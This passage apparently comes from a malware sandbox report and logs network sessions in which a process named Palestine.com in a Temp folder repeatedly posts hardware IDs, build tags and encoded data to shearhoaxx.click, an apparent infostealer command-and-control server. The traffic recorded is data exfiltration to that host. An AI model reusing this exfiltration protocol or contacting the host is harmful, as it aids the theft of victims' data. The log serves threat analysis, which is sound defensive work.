                                                                                                                                                                                                                                            2024-12-23 09:36:07 UTC167INData Raw: 49 6b 6d 61 78 37 31 41 4d 56 42 6a 46 4f 45 53 35 76 6b 6a 74 6f 57 4e 63 6e 46 74 61 62 43 45 55 37 70 2b 58 35 48 6e 4a 58 64 7a 6e 52 69 43 4c 78 56 67 32 36 48 64 4a 6c 62 6a 2f 6e 4a 77 6c 34 68 67 63 2b 38 35 5a 74 56 52 2f 54 7a 65 6b 57 5a 6b 4a 4b 45 4f 6d 4d 57 38 51 6a 4d 51 35 6c 56 68 30 32 57 34 49 4c 50 45 44 58 46 78 4c 53 74 79 42 38 45 74 62 70 79 56 64 48 48 33 62 55 35 61 68 44 2f 47 34 4e 57 78 55 54 4a 52 35 47 76 30 5a 30 63 4e 73 48 48 76 4b 6e 49 48 55 58 33 39 48 0d 0a
                                                                                                                                                                                                                                            Data Ascii: Ikmax71AMVBjFOES5vkjtoWNcnFtabCEU7p+X5HnJXdznRiCLxVg26HdJlbj/nJwl4hgc+85ZtVR/TzekWZkJKEOmMW8QjMQ5lVh02W4ILPEDXFxLStyB8EtbpyVdHH3bU5ahD/G4NWxUTJR5Gv0Z0cNsHHvKnIHUX39H
                                                                                                                                                                                                                                            2024-12-23 09:36:07 UTC1369INData Raw: 32 38 63 63 0d 0a 4a 49 6d 4a 65 56 6b 6a 56 68 47 50 30 44 7a 45 69 50 57 49 78 45 6d 75 75 50 30 6c 42 32 67 63 2b 6f 35 5a 74 56 61 39 7a 50 4e 32 79 72 33 34 4c 4f 4c 53 55 58 38 45 32 62 43 59 64 65 68 55 69 53 36 59 44 52 47 6a 48 4b 78 4c 75 68 7a 78 78 42 2f 66 74 77 53 4a 43 62 6b 59 6f 79 5a 68 50 7a 41 73 78 42 79 78 50 4a 52 34 57 76 30 5a 30 31 4c 38 72 47 74 75 58 63 57 31 32 37 2f 58 6b 4e 79 64 2b 52 69 54 4a 6a 46 66 41 4d 78 55 47 4f 56 59 31 42 6d 2b 6d 4b 30 68 51 39 77 4d 65 30 71 63 30 66 52 66 72 32 66 6b 4b 61 6d 74 33 4f 64 47 49 49 76 46 57 44 65 49 68 4c 6e 6c 43 52 72 35 61 54 43 58 6a 47 78 50 44 39 67 78 52 57 38 66 42 37 53 4a 36 61 6e 6f 38 7a 61 42 62 77 42 38 70 42 6a 56 4b 41 55 70 37 6a 68 39 6f 65 4e 4d 2f 46 75 71 62
                                                                                                                                                                                                                                            Data Ascii: 28ccJImJeVkjVhGP0DzEiPWIxEmuuP0lB2gc+o5ZtVa9zPN2yr34LOLSUX8E2bCYdehUiS6YDRGjHKxLuhzxxB/ftwSJCbkYoyZhPzAsxByxPJR4Wv0Z01L8rGtuXcW127/XkNyd+RiTJjFfAMxUGOVY1Bm+mK0hQ9wMe0qc0fRfr2fkKamt3OdGIIvFWDeIhLnlCRr5aTCXjGxPD9gxRW8fB7SJ6ano8zaBbwB8pBjVKAUp7jh9oeNM/Fuqb
                                                                                                                                                                                                                                            2024-12-23 09:36:07 UTC1369INData Raw: 4f 68 2f 53 70 61 55 6c 59 73 37 59 77 4c 77 41 39 46 4d 6d 55 2f 4a 44 74 33 6f 6b 5a 31 49 65 50 66 50 6f 4c 58 41 56 33 58 74 2b 57 4e 47 6e 4a 50 64 6e 33 70 38 55 50 73 42 67 78 48 4c 57 34 5a 4a 6e 75 43 49 31 42 77 31 78 4d 47 31 70 4d 55 52 54 76 48 36 63 30 75 51 6d 70 65 44 4e 57 38 5a 2b 77 58 45 53 70 6b 64 78 77 43 61 39 38 6d 46 55 42 48 47 32 72 36 31 67 77 6f 4b 34 72 70 79 51 64 48 48 33 59 51 2b 61 68 54 37 41 63 56 4d 6a 56 43 49 54 35 7a 76 68 74 6b 62 4d 63 66 4a 76 61 44 4f 45 56 62 78 38 58 70 42 6d 4a 4f 51 77 48 6f 6c 46 2b 52 4e 6d 77 6d 36 55 49 64 4f 6d 76 6e 4a 77 6c 34 68 67 63 2b 38 35 5a 74 56 52 66 66 31 64 6b 4b 53 6e 4a 79 4b 4a 6e 63 63 39 51 58 47 52 59 42 54 6a 31 4b 62 34 49 44 65 45 7a 48 47 77 4c 79 76 77 42 49 45
                                                                                                                                                                                                                                            Data Ascii: Oh/SpaUlYs7YwLwA9FMmU/JDt3okZ1IePfPoLXAV3Xt+WNGnJPdn3p8UPsBgxHLW4ZJnuCI1Bw1xMG1pMURTvH6c0uQmpeDNW8Z+wXESpkdxwCa98mFUBHG2r61gwoK4rpyQdHH3YQ+ahT7AcVMjVCIT5zvhtkbMcfJvaDOEVbx8XpBmJOQwHolF+RNmwm6UIdOmvnJwl4hgc+85ZtVRff1dkKSnJyKJncc9QXGRYBTj1Kb4IDeEzHGwLyvwBIE
                                                                                                                                                                                                                                            2024-12-23 09:36:07 UTC1369INData Raw: 75 42 69 4a 71 66 65 6e 78 51 2b 77 47 44 45 63 74 62 67 45 61 61 36 59 66 50 46 54 37 4f 78 37 6d 73 78 78 31 48 2b 2f 35 78 53 70 53 63 6b 59 73 7a 5a 68 2f 34 42 4d 31 41 68 42 33 48 41 4a 72 33 79 59 56 51 47 64 72 4c 76 4b 69 44 43 67 72 69 75 6e 4a 42 30 63 66 64 6a 44 70 67 45 50 59 4c 78 30 79 4e 56 34 78 41 6c 75 79 47 32 52 59 38 7a 73 69 37 72 4d 49 54 51 66 48 78 63 30 43 53 6d 5a 76 41 65 69 55 58 35 45 32 62 43 61 74 47 68 45 79 61 72 35 61 54 43 58 6a 47 78 50 44 39 67 78 35 49 2f 2f 31 31 51 4a 4b 58 6d 49 51 2b 59 42 44 30 48 38 74 4a 6a 45 2b 62 51 4a 54 71 68 64 34 51 50 4d 66 42 74 71 62 48 56 51 71 37 2f 57 30 4e 79 64 2b 77 6a 44 4e 4d 46 2b 64 4e 33 41 65 53 48 59 35 4d 33 62 66 4a 33 42 73 79 7a 73 57 7a 6f 38 41 65 51 66 48 37 63
                                                                                                                                                                                                                                            Data Ascii: uBiJqfenxQ+wGDEctbgEaa6YfPFT7Ox7msxx1H+/5xSpSckYszZh/4BM1AhB3HAJr3yYVQGdrLvKiDCgriunJB0cfdjDpgEPYLx0yNV4xAluyG2RY8zsi7rMITQfHxc0CSmZvAeiUX5E2bCatGhEyar5aTCXjGxPD9gx5I//11QJKXmIQ+YBD0H8tJjE+bQJTqhd4QPMfBtqbHVQq7/W0Nyd+wjDNMF+dN3AeSHY5M3bfJ3BsyzsWzo8AeQfH7c
                                                                                                                                                                                                                                            2024-12-23 09:36:07 UTC1369INData Raw: 64 32 47 59 72 55 4f 35 4e 6d 77 6e 4d 58 70 74 53 6d 2b 79 66 33 6c 63 47 2f 2b 2b 6d 72 38 51 46 51 2b 7a 31 4e 51 50 52 6b 4e 33 59 44 53 55 5a 2b 78 62 53 58 34 5a 4e 6a 67 43 69 6f 63 6e 46 55 47 43 42 2f 62 4f 72 7a 52 4a 53 36 72 64 53 57 35 75 59 6a 59 63 6a 61 6c 43 79 54 63 55 4a 30 77 37 48 41 4a 6e 2b 79 59 56 41 61 70 71 64 34 2f 4b 54 52 31 75 31 34 7a 56 62 30 63 66 50 7a 6e 52 33 55 4b 52 4e 68 45 71 5a 54 34 39 44 69 2b 7a 4f 34 79 34 66 32 38 57 32 73 74 49 72 65 76 7a 67 65 45 75 47 6a 74 47 56 4e 32 73 65 2b 78 75 44 42 38 74 53 79 52 69 6b 72 38 47 64 4c 33 61 42 30 50 44 39 67 79 42 48 39 66 52 79 57 34 44 53 75 70 6f 35 59 77 66 74 54 59 30 4a 6a 52 33 52 45 4e 4f 76 6a 63 78 51 59 4a 47 61 36 2f 43 51 51 68 53 70 35 54 74 55 30 59
                                                                                                                                                                                                                                            Data Ascii: d2GYrUO5NmwnMXptSm+yf3lcG/++mr8QFQ+z1NQPRkN3YDSUZ+xbSX4ZNjgCiocnFUGCB/bOrzRJS6rdSW5uYjYcjalCyTcUJ0w7HAJn+yYVAapqd4/KTR1u14zVb0cfPznR3UKRNhEqZT49Di+zO4y4f28W2stIrevzgeEuGjtGVN2se+xuDB8tSyRikr8GdL3aB0PD9gyBH9fRyW4DSupo5YwftTY0JjR3RENOvjcxQYJGa6/CQQhSp5TtU0Y
                                                                                                                                                                                                                                            2024-12-23 09:36:07 UTC1369INData Raw: 59 67 62 74 54 59 30 4a 68 42 33 52 65 64 32 6e 79 65 4a 65 65 4e 6d 49 36 4f 58 32 46 6b 72 31 2f 57 4e 63 33 4c 69 54 68 7a 56 7a 41 4f 73 43 67 77 66 4c 57 38 6b 59 7a 36 48 4a 32 51 46 34 6d 5a 6a 69 2f 70 5a 47 45 36 75 6f 61 67 4f 49 33 34 76 41 62 44 64 65 76 42 2b 44 45 63 73 61 69 6c 4b 50 36 59 72 4c 45 33 2f 2f 39 70 65 72 78 42 52 53 36 2b 31 36 41 72 2b 70 76 4c 34 4b 63 42 50 79 41 38 52 66 6d 68 33 48 41 4a 4b 76 30 65 52 51 63 49 48 33 2f 75 58 62 56 52 79 37 7a 33 5a 44 6e 35 69 4c 6b 58 6c 43 48 76 73 4d 31 56 6d 63 55 73 5a 75 71 38 37 4a 6b 31 41 2b 67 5a 44 69 36 34 4d 52 56 62 75 69 4a 52 2f 4b 79 73 37 58 5a 44 63 50 73 68 53 44 58 38 73 46 32 77 37 64 2f 63 6d 46 55 48 2f 43 32 71 4b 6a 77 41 4e 48 76 4d 52 4c 61 70 2b 59 6e 4a 59
                                                                                                                                                                                                                                            Data Ascii: YgbtTY0JhB3Red2nyeJeeNmI6OX2Fkr1/WNc3LiThzVzAOsCgwfLW8kYz6HJ2QF4mZji/pZGE6uoagOI34vAbDdevB+DEcsailKP6YrLE3//9perxBRS6+16Ar+pvL4KcBPyA8Rfmh3HAJKv0eRQcIH3/uXbVRy7z3ZDn5iLkXlCHvsM1VmcUsZuq87Jk1A+gZDi64MRVbuiJR/Kys7XZDcPshSDX8sF2w7d/cmFUH/C2qKjwANHvMRLap+YnJY


                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                            13192.168.2.1649715172.67.129.494436148C:\Users\user\AppData\Local\Temp\650429\Palestine.com
                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                            2024-12-23 09:36:08 UTC281OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                            Content-Type: multipart/form-data; boundary=LQVNKLL36YG3RCUP2
                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                            Content-Length: 12836
                                                                                                                                                                                                                                            Host: shearhoaxx.click
                                                                                                                                                                                                                                            2024-12-23 09:36:08 UTC12836OUTData Raw: 2d 2d 4c 51 56 4e 4b 4c 4c 33 36 59 47 33 52 43 55 50 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 36 45 33 31 41 34 35 41 37 42 35 46 32 43 41 31 43 38 42 41 32 31 45 30 32 31 41 38 41 41 36 45 0d 0a 2d 2d 4c 51 56 4e 4b 4c 4c 33 36 59 47 33 52 43 55 50 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 4c 51 56 4e 4b 4c 4c 33 36 59 47 33 52 43 55 50 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 44 76 68 38 75 69 2d 2d 38 38 38 0d 0a 2d 2d 4c
                                                                                                                                                                                                                                            Data Ascii: --LQVNKLL36YG3RCUP2Content-Disposition: form-data; name="hwid"6E31A45A7B5F2CA1C8BA21E021A8AA6E--LQVNKLL36YG3RCUP2Content-Disposition: form-data; name="pid"2--LQVNKLL36YG3RCUP2Content-Disposition: form-data; name="lid"Dvh8ui--888--L
                                                                                                                                                                                                                                            2024-12-23 09:36:09 UTC1126INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Date: Mon, 23 Dec 2024 09:36:09 GMT
                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            Set-Cookie: PHPSESSID=14im129k8fp9vsiff1anagjk7g; expires=Fri, 18 Apr 2025 03:22:48 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                                                                                            X-Frame-Options: DENY
                                                                                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                            X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                            vary: accept-encoding
                                                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=u9bVvJGCTRJYcYUA6IRNBvWq2Tv01nqOHj8IXrLjex%2FDdIoJbMM9TXl64CS2UDj1hXXzADMRTxdKKXOcXcK2233%2FBi4Qr%2BlS4ElbqRHxX4K2o%2BqbtP4awsd01b66TWQc6R5L"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                            CF-RAY: 8f675d98df1e4303-EWR
                                                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=2168&min_rtt=2159&rtt_var=829&sent=9&recv=17&lost=0&retrans=0&sent_bytes=2841&recv_bytes=13775&delivery_rate=1304736&cwnd=219&unsent_bytes=0&cid=16d1d50a43ec3e0b&ts=856&x=0"
                                                                                                                                                                                                                                            2024-12-23 09:36:09 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                                                                                                            Data Ascii: fok 8.46.123.189
                                                                                                                                                                                                                                            2024-12-23 09:36:09 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                            Data Ascii: 0


                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                            14192.168.2.1649716172.67.129.494436148C:\Users\user\AppData\Local\Temp\650429\Palestine.com
                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                            2024-12-23 09:36:11 UTC276OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                            Content-Type: multipart/form-data; boundary=ZW6C9XEVM7Q6
                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                            Content-Length: 15041
                                                                                                                                                                                                                                            Host: shearhoaxx.click
                                                                                                                                                                                                                                            2024-12-23 09:36:11 UTC15041OUTData Raw: 2d 2d 5a 57 36 43 39 58 45 56 4d 37 51 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 36 45 33 31 41 34 35 41 37 42 35 46 32 43 41 31 43 38 42 41 32 31 45 30 32 31 41 38 41 41 36 45 0d 0a 2d 2d 5a 57 36 43 39 58 45 56 4d 37 51 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 5a 57 36 43 39 58 45 56 4d 37 51 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 44 76 68 38 75 69 2d 2d 38 38 38 0d 0a 2d 2d 5a 57 36 43 39 58 45 56 4d 37 51 36 0d 0a 43 6f
                                                                                                                                                                                                                                            Data Ascii: --ZW6C9XEVM7Q6Content-Disposition: form-data; name="hwid"6E31A45A7B5F2CA1C8BA21E021A8AA6E--ZW6C9XEVM7Q6Content-Disposition: form-data; name="pid"2--ZW6C9XEVM7Q6Content-Disposition: form-data; name="lid"Dvh8ui--888--ZW6C9XEVM7Q6Co
                                                                                                                                                                                                                                            2024-12-23 09:36:12 UTC1128INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Date: Mon, 23 Dec 2024 09:36:12 GMT
                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            Set-Cookie: PHPSESSID=oofl1ikkqd51p4pfpr1cmd3gq1; expires=Fri, 18 Apr 2025 03:22:50 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                                                                                            X-Frame-Options: DENY
                                                                                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                            X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                            vary: accept-encoding
                                                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=yhQHsPp5dfJuLvgD6Eshg1%2FvOmiVo9H8zWIORnJG9HprQOi0gRg%2FnYqtOMJ8Nx87x01SFPEoEL7rqU7hugm8m0%2ByQZnMdj%2FET63om53ukWiDQ9815DChYhKIgShWDusAfSdy"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                            CF-RAY: 8f675da7290143a1-EWR
                                                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1744&min_rtt=1738&rtt_var=664&sent=13&recv=20&lost=0&retrans=0&sent_bytes=2841&recv_bytes=15975&delivery_rate=1633109&cwnd=233&unsent_bytes=0&cid=26a84796ff98470f&ts=1152&x=0"
                                                                                                                                                                                                                                            2024-12-23 09:36:12 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                                                                                                            Data Ascii: fok 8.46.123.189
                                                                                                                                                                                                                                            2024-12-23 09:36:12 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                            Data Ascii: 0


                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                            15192.168.2.1649717172.67.129.494436148C:\Users\user\AppData\Local\Temp\650429\Palestine.com
                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                            2024-12-23 09:36:13 UTC273OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                            Content-Type: multipart/form-data; boundary=U3E7FSXK7
                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                            Content-Length: 20366
                                                                                                                                                                                                                                            Host: shearhoaxx.click
                                                                                                                                                                                                                                            2024-12-23 09:36:13 UTC15331OUTData Raw: 2d 2d 55 33 45 37 46 53 58 4b 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 36 45 33 31 41 34 35 41 37 42 35 46 32 43 41 31 43 38 42 41 32 31 45 30 32 31 41 38 41 41 36 45 0d 0a 2d 2d 55 33 45 37 46 53 58 4b 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 55 33 45 37 46 53 58 4b 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 44 76 68 38 75 69 2d 2d 38 38 38 0d 0a 2d 2d 55 33 45 37 46 53 58 4b 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73
                                                                                                                                                                                                                                            Data Ascii: --U3E7FSXK7Content-Disposition: form-data; name="hwid"6E31A45A7B5F2CA1C8BA21E021A8AA6E--U3E7FSXK7Content-Disposition: form-data; name="pid"3--U3E7FSXK7Content-Disposition: form-data; name="lid"Dvh8ui--888--U3E7FSXK7Content-Dispos
                                                                                                                                                                                                                                            2024-12-23 09:36:13 UTC5035OUTData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 e4 06 a2 60 61 d3 4f 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 9b dc 60 14 2c 6c fa 69 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 93 1b 88 82 85 4d 3f 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 6c 72 83 51 b0 b0 e9 a7 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 4d 6e 20 0a 16 36 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 c9 0d 04 bf 16 4b 06 d7 e2 c1 b5 e0 df 06 5f 33 1f 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                            Data Ascii: `aO`,li`M?lrQMn 64K_3
                                                                                                                                                                                                                                            2024-12-23 09:36:14 UTC1123INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Date: Mon, 23 Dec 2024 09:36:14 GMT
                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            Set-Cookie: PHPSESSID=mgh5eckhs0erpbqtcg7pfn85q7; expires=Fri, 18 Apr 2025 03:22:53 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                                                                                            X-Frame-Options: DENY
                                                                                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                            X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                            vary: accept-encoding
                                                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=dXgCz8L6xqeZnBrgjOlugLEiZrxXNE8BHdpzd9JOJoUBn19N20ScENf4esjTSQz1NtpB4dzr2tMM25P0cnaOhnKigUzmPhrDF%2FCe1hrlpYPpjS%2B6lBSgi8goyECOyGcaPa7K"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                            CF-RAY: 8f675db7becc42dc-EWR
                                                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1738&min_rtt=1730&rtt_var=666&sent=16&recv=26&lost=0&retrans=0&sent_bytes=2841&recv_bytes=21319&delivery_rate=1623123&cwnd=251&unsent_bytes=0&cid=39968d48a70fe472&ts=976&x=0"
                                                                                                                                                                                                                                            2024-12-23 09:36:14 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                                                                                                            Data Ascii: fok 8.46.123.189
                                                                                                                                                                                                                                            2024-12-23 09:36:14 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                            Data Ascii: 0


                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                            16192.168.2.1649718172.67.129.494436148C:\Users\user\AppData\Local\Temp\650429\Palestine.com
                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                            2024-12-23 09:36:16 UTC278OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                            Content-Type: multipart/form-data; boundary=RJF31Z0V4QLBNKJ
                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                            Content-Length: 1167
                                                                                                                                                                                                                                            Host: shearhoaxx.click
                                                                                                                                                                                                                                            2024-12-23 09:36:16 UTC1167OUTData Raw: 2d 2d 52 4a 46 33 31 5a 30 56 34 51 4c 42 4e 4b 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 36 45 33 31 41 34 35 41 37 42 35 46 32 43 41 31 43 38 42 41 32 31 45 30 32 31 41 38 41 41 36 45 0d 0a 2d 2d 52 4a 46 33 31 5a 30 56 34 51 4c 42 4e 4b 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 52 4a 46 33 31 5a 30 56 34 51 4c 42 4e 4b 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 44 76 68 38 75 69 2d 2d 38 38 38 0d 0a 2d 2d 52 4a 46 33 31 5a 30
                                                                                                                                                                                                                                            Data Ascii: --RJF31Z0V4QLBNKJContent-Disposition: form-data; name="hwid"6E31A45A7B5F2CA1C8BA21E021A8AA6E--RJF31Z0V4QLBNKJContent-Disposition: form-data; name="pid"1--RJF31Z0V4QLBNKJContent-Disposition: form-data; name="lid"Dvh8ui--888--RJF31Z0
                                                                                                                                                                                                                                            2024-12-23 09:36:16 UTC1126INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Date: Mon, 23 Dec 2024 09:36:16 GMT
                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            Set-Cookie: PHPSESSID=6115bgbkov8haufvgibuonpla6; expires=Fri, 18 Apr 2025 03:22:55 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                                                                                            X-Frame-Options: DENY
                                                                                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                            X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                            vary: accept-encoding
                                                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hKY%2FUV%2BsPWlLIgeWSIxXm4SRowd6O6VOhXPscZPRfhkLa8i%2FHo9CCVRB1KheNaqZYTGhi6kxBSzpVM3BHMTVHxss86hnq%2Be%2FhvyeZC3PZGAQk5tK8jZPhj4QwNkvX6QDarmu"}],"group":"cf-nel","max_age":604800}
